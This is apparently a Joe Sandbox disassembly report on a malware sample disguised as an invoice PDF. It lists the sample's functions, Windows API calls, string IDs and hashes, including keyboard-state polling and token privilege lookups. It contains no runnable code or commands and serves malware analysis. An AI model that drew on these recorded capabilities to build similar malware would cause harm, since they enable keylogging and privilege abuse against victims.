                                                                              • Opcode ID: bb5ad6bab5d95615020ad0420de35ae53fe057283f978db3a86585e9485fe4c3
                                                                              • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                              • Opcode Fuzzy Hash: bb5ad6bab5d95615020ad0420de35ae53fe057283f978db3a86585e9485fe4c3
                                                                              • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                              • _wcslen.LIBCMT ref: 00460502
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                              • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                              • String ID: ThumbnailClass
                                                                              • API String ID: 4123061591-1241985126
                                                                              • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                              • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                              • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                              • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                              APIs
                                                                                • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                              • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                              • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                              • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                              • ReleaseCapture.USER32 ref: 0046F589
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                              • API String ID: 2483343779-2060113733
                                                                              • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                              • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                              • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                              • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                              APIs
                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                              • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                              • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                              • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                              • String ID: 2
                                                                              • API String ID: 1331449709-450215437
                                                                              • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                              • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                              • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                              • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID: static
                                                                              • API String ID: 3375834691-2160076837
                                                                              • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                              • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                              • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                              • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                              • _memcmp.LIBCMT ref: 004394A9
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                              Strings
                                                                              • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                              • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                              • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                              • API String ID: 1446985595-805462909
                                                                              • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                              • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                              • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                              • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                              • API String ID: 2907320926-41864084
                                                                              • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                              • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                              • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                              • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                              APIs
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                              • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 1932665248-0
                                                                              • Opcode ID: 2d23e00fe62c3ee47028d7bee0db5ecf3fc2b2532e5c78a39a2b94196a7bb2ad
                                                                              • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                              • Opcode Fuzzy Hash: 2d23e00fe62c3ee47028d7bee0db5ecf3fc2b2532e5c78a39a2b94196a7bb2ad
                                                                              • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                              • _memset.LIBCMT ref: 004481BA
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                              • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                              • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                              • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                              • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                              APIs
                                                                                • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                              • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                              • DeleteObject.GDI32(00630000), ref: 0046EB4F
                                                                              • DestroyIcon.USER32(006C0061), ref: 0046EB67
                                                                              • DeleteObject.GDI32(87251120), ref: 0046EB7F
                                                                              • DestroyWindow.USER32(0041005C), ref: 0046EB97
                                                                              • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                              • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                              • String ID:
                                                                              • API String ID: 802431696-0
                                                                              • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                              • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                              • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                              • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                              • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                              • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                              • GetKeyState.USER32(00000011), ref: 00444E77
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                              • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                              • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                              • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                              • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                              • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HH
                                                                              • API String ID: 0-2761332787
                                                                              • Opcode ID: d978b2fcd786a8107de4b377c61376d4dc68e24c8fc35b756a3070290f87ec50
                                                                              • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                                                              • Opcode Fuzzy Hash: d978b2fcd786a8107de4b377c61376d4dc68e24c8fc35b756a3070290f87ec50
                                                                              • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                              • _wcslen.LIBCMT ref: 00450944
                                                                              • _wcscat.LIBCMT ref: 00450955
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat_wcslen
                                                                              • String ID: -----$SysListView32
                                                                              • API String ID: 4008455318-3975388722
                                                                              • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                              • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                              • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                              • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00448625
                                                                              • CreateMenu.USER32 ref: 0044863C
                                                                              • SetMenu.USER32(?,00000000), ref: 0044864C
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                              • IsMenu.USER32(?), ref: 004486EB
                                                                              • CreatePopupMenu.USER32 ref: 004486F5
                                                                              • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                              • DrawMenuBar.USER32 ref: 00448742
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 176399719-4108050209
                                                                              • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                              • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                              • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                              • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                              • GetParent.USER32 ref: 004692A4
                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                              • GetParent.USER32 ref: 004692C7
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                              Strings
                                                                              Memory Dump Source
